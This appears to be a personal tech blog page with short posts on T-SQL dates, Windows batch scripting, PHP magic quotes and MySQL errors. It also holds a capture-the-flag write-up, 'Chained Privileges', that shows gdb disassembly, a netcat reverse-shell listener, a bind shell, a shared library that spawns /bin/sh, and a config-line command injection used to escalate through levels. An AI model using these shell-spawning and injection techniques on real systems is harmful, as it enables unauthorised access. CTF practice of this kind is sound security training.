Create date for next september in T-SQL

Posted on May 16, 2012 by Theis Mackeprang
Microsoft SQL Server 2008 R2 has no function to make a specific date. One option is to set a datetime field to a string, for example '2012-05-01'. However, the resulting datetime depends on the current language settings, or dateformat. It is possible to construct the date ’2012-09-01′ with the expression DATEADD(MONTH, (2012-1900)*12+(9-1), 1-1). In order to select the first of next september month, the year part depends on the current date. By adding 4 months to the current date, the year part of the resulting date will be the current year, if the current date is before september, and next year if current date is already september. Thus, DATEADD(MONTH, (YEAR(DATEADD(MONTH,4,GETDATE()))-1900)*12+(9-1), 1-1) results in the date for the first of next september.
Posted in SQL Server | Tagged , , , | Leave a comment

Chained Privileges

Posted on November 7, 2011 by Theis Mackeprang

Challenge from PROSA CTF 2011

level00

$ gdb level01
(gdb) disas main
Dump of assembler code for function main:
   0x00000000004004f4 <+0>:	push   rbp
   0x00000000004004f5 <+1>:	mov    rbp,rsp
   0x00000000004004f8 <+4>:	sub    rsp,0x10
   0x00000000004004fc <+8>:	mov    DWORD PTR [rbp-0x4],edi
   0x00000000004004ff <+11>:	mov    QWORD PTR [rbp-0x10],rsi
   0x0000000000400503 <+15>:	cmp    DWORD PTR [rbp-0x4],0x1
   0x0000000000400507 <+19>:	jle    0x40051c <main+40>
   0x0000000000400509 <+21>:	mov    rax,QWORD PTR [rbp-0x10]
   0x000000000040050d <+25>:	add    rax,0x8
   0x0000000000400511 <+29>:	mov    rax,QWORD PTR [rax]
   0x0000000000400514 <+32>:	mov    rdi,rax
   0x0000000000400517 <+35>:	call   0x400400 <system@plt>
   0x000000000040051c <+40>:	mov    eax,0x0
   0x0000000000400521 <+45>:	leave  
   0x0000000000400522 <+46>:	ret    
End of assembler dump.

This one simply calls system(argv[1]) if argc > 1, so ./level01 "cat level01.txt" leads to next level.

level01

If at least one argument is supplied to the program, the first argument is compared against whatever is on address 0x4006a9, and calls execve("/bin/sh", ["/bin/sh"], 0). (gdb) x/s 0x4006a9 reveals that the magic argument is fam4p894jgajg4h23.

$ ./level02 fam4p894jgajg4h23
bash-4.2$ cat level02.txt 
u5oey7VKvsSnPGu3zF

level02

This one creates a socket to the address and port specified by argument 1 and 2 to the program respectively, and then overwrite stdin, stdout and stderr with the socket and then executes a /bin/sh. So first set netcat up to listen on a port, nc.traditional -vv -l -p 1337, on another host/session and call ./level03 127.0.0.1 1337. Now fetch the password for next level from the netcat session:

$ nc.traditional -vv -l -p 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 59019
cat level03.txt
puUcxcVHFdc4mUcF8G

level03

This one is similar to the previous level, except that it binds a shell to the host and port supplied in the program arguments. So this time we run ./level04 127.0.0.1 1337 and connects to it from another session:

$ nc 127.0.0.1 1337
cat level04.txt
1oaJV4LNozqWAxzpgB

level04

This one calls dlopen(argv[1]) and calls the function “mystery_function” from the shared library. So lets make a library with this function and load it.

$ cd /tmp/
$ cat win.c 
#include <stdlib.h>
void mystery_function() {
	system("/bin/sh");
}
$ gcc -c -fPIC win.c -o win.o
$ gcc -shared -Wl,-soname,libwin.so.1 -o libwin.so.1.0.1 win.o
$ cd
$ ./level05 /tmp/libwin.so.1.0.1 
$ cat level05.txt
bfnX60jzsiAU5XvNhJ

level05

This time the file argv[1] is read line by line. Each line is split by the character ‘=’ into A and B. Then a function trim is applied to first B then A and then handle(A,B) is called. Disassembling handle reveals that a call rdx is made, so lets take a closer look. The function does something like this:

if (A[0] != '#') {
  for (i = 0; i <= 1; i++) {
    if (strcmp(A, 0x601080+((i*3) << 3)) {
      // do more
    }
  }
}

So are these strings? For two possible choices of i, A is compared to either (gdb) x/s 0x601080: "please_print" or (gdb) x/s 0x601080+24: "please_do". Check if please_do will do commands:

$ echo "please_do=/bin/sh" > /tmp/6.txt 
$ ./level06 /tmp/6.txt
$ cat level06.txt
UwvKom36jC2hhh2K0G

level06

This time the program takes to arguments A and B, a long integer and an integer. Then it sets the function a to be called when a SIGSEGV signal is send. It then calls the function recursive that decrements B until it is zero and then calls address specified in A. So if A is not a valid function pointer, this indeed leads to a segmentation fault.

The function a checks whether the difference between two addresses is between 1000 and 1099. Break on comparison to 0x3e8 and then run with different inputs, remember to continue on the first segmentation fault. You will then quickly see that the difference depends on the number of recursions.

$ for i in {0..100}; do ./level07 100 $i; done
$ cat level07.txt
8Svej8aJShJJN069o3
Posted in Uncategorized | Tagged , | Leave a comment

Localhost Slow on Windows 7

Posted on December 28, 2010 by Theis Mackeprang

I had some trouble figuring out why http://localhost, was responding slow compared to 127.0.0.1 when accessing my local apache http server. It turned out that by default the hosts file contains the following line:

# 127.0.0.1 localhost

By uncommenting this line, as follows (remove the hash):

127.0.0.1 localhost

A DNS look-up will then never be performed before it is determined that localhost is actually 127.0.0.1.

Posted in Windows | Tagged , , , , | 1 Comment

Read output from VBS in CMD scripts

Posted on August 2, 2010 by Theis Mackeprang
Here is a sample VB script, test.vbs:
  1. wscript.echo "Testoutput"
  2. wscript.echo "This is a test"
The strings echoed from the VBS script can be read from a calling CMD script, with a standard FOR loop using the options /F and delims as follows, test.cmd:
  1. @echo off
  2. FOR /F "usebackq delims=" %%i IN (`cscript test.vbs`) DO Set myvar=%%i
  3. echo Srcipt result = "%myvar%"
Notice that only the last line echoed from the VB script is stored. If you want to store multiple lines, use the FOR loop token option also. See Get date in Windows CMS script for an example.
Posted in Batch | Leave a comment

Get date in Windows CMD script

Posted on July 26, 2010 by Theis Mackeprang

Apparently it depends on the Windows installation language, how the date function or %DATE% environment variable is formatted. So here is a very ugly hack to get a julian date (YYYYMMDDHHiiss) in a Windows batch script, independent off system locale settings:

  1. @echo off
  2. FOR /F "usebackq tokens=1-10 delims=+|NOW():- " %%a IN (`mysql -e "SELECT NOW();" -u root -ptest`) DO set datetime=%%a%%b%%c%%d%%e%%f
  3. echo %datetime%

Notice that this requires MySQL. If you do not like to use your MySQL root code, you can create a new user with absolutely no rights granted.

But again, this solution is stupid, I hope you will never need it or use it. I just thought I would share, since it was driving my co-worker crazy, and we ended up using it to name a MySQL dump.

Posted in Batch, MySQL | Tagged , , , , | 2 Comments

Add or remove magic quotes in PHP

Posted on July 18, 2010 by Theis Mackeprang

When you make a PHP script, but you do not know how PHP is configured on the server the script is being executed on, you might not know whether or not to add or strip quotes from get and post data. Notice that the $_FILES array is not affected by magic quotes.

Warning: one should handle slashes on keys also, not only values. See first comment.

Here is a script that strips away magic quotes, if they were added:

  1. < ?
  2. if(get_magic_quotes_gpc()) {
  3. function undo_magic_quotes($array) {
  4. return is_array($array) ? array_map('undo_magic_quotes', $array) : stripslashes($array);
  5. }
  6. $_GET = undo_magic_quotes($_GET);
  7. $_POST = undo_magic_quotes($_POST);
  8. $_COOKIE = undo_magic_quotes($_COOKIE);
  9. $_REQUEST = undo_magic_quotes($_REQUEST);
  10. }
  11. ?>

And likewise, here is a script that adds magic quotes, if they were not already applied:

Continue reading
Posted in PHP | Tagged , , , , | 2 Comments

Force pure HTML editor in WordPress

Posted on July 15, 2010 by Theis Mackeprang

After installing WordPress for this blog, I realized that I was forced to use the stupid TinyMCE WYSIWYG editor. I smiled when i found out that I was able to set a HTML editor only flag in my account settings. But this did not turn the editor into a pure HTML editor, since every line i wrote was replaced by <p>{the_line}<p>, which is not practical when you want to paste programming code.

Here is how you disable this unacceptable behavior the easy way (WP kindly asks you to find a plugin that undo the paragraphs, but you know…).

Continue reading
Posted in HTML, PHP | Tagged , , | 2 Comments

Select count from multiple tables

Posted on July 13, 2010 by Theis Mackeprang

Sometimes a parent table have more than one table with multiple references to a field in the parent table. Then the question is how to count references from more than one table in a single query. I have found 5 different ways to achieve this result, and therefore I have run a few tests, to see which was better.

To test this I made this small PHP script, that creates a parent table and child table. Then a loop populates the tables with 1,000 parent rows, approximately 15 children of type 1 and approximately 75 children of type 2. This is done before each query, to make sure that all queries have the same conditions.

Continue reading
Posted in MySQL, PHP | Tagged , , , , , | 2 Comments

Foreign keys and MySQL (errno: 150)

Posted on July 12, 2010 by Theis Mackeprang

Today I tried to execute the SQL

mysql> ALTER TABLE parent_child ADD FOREIGN KEY (parent_id)
	REFERENCES parent(id) ON DELETE CASCADE;

in MySQL, and got the error

Can't create table 'db.#sql-aa1_1' (errno: 150)

I tried to look up error number 150 on the internet, but found many reasons why error no. 150 could occur; none was my case. Common mistakes that causes this error are:

Continue reading
Posted in MySQL | Tagged , , , | Leave a comment

Only a few short .dk domains left

Posted on July 11, 2010 by Theis Mackeprang

Hello world! This blog is simply named 5p, because it was one of the few domains left with less than three characters. I chose 5p among these, since p can stand for many good things, for example: Professionalism, Problemsolving, Planning, Procedures or Performance. There are actually 3,205 different words that starts with the letter p in the danish language, without conjugations.

Actually 5p was the only one left out of 6 domains. Unfortunately it is not easy to search for domain names, so to make this conclusion i made what some might call a “dictionary attack” at the .dk provider. I simply calculated all combinations of danish domains with 2 characters and looked them up, with a small php script i executed in a cmd prompt. The other 5 domains left was (notice that the first two starts with zero, not the letter o):

Continue reading
Posted in PHP | Tagged , , , | 1 Comment